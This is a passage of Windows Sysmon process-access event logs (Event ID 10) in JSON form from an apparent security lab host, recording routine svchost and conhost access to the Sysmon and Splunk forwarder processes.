08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8027,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8028,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8029,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8030,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8031,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8032,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8033,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8034,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:45.834\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2295-5F25-0000-0010B5CC0F00}\r\nTargetProcessId: 228\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:45.834","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2295-5F25-0000-0010B5CC0F00}","TargetProcessId":"228","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
